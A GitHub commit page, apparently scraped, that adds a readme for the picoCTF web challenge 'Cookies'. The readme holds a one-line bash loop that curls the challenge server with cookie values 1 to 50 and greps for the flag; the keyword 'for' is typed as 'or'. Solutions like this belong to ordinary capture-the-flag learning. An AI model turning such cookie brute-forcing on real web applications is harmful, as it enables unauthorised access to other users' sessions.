We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent c575555 commit 8390652Copy full SHA for 8390652
src/PICOCTF/WEB/cookies/readme.md
@@ -1 +1,6 @@
1
# Cookies
2
+
3
+```bash
4
+or i in {1..50};do echo "$i"; curl --silent http://mercury.picoctf.net:21485/check -b"name=$i" | grep "Flag"; done
5
6
+```
0 commit comments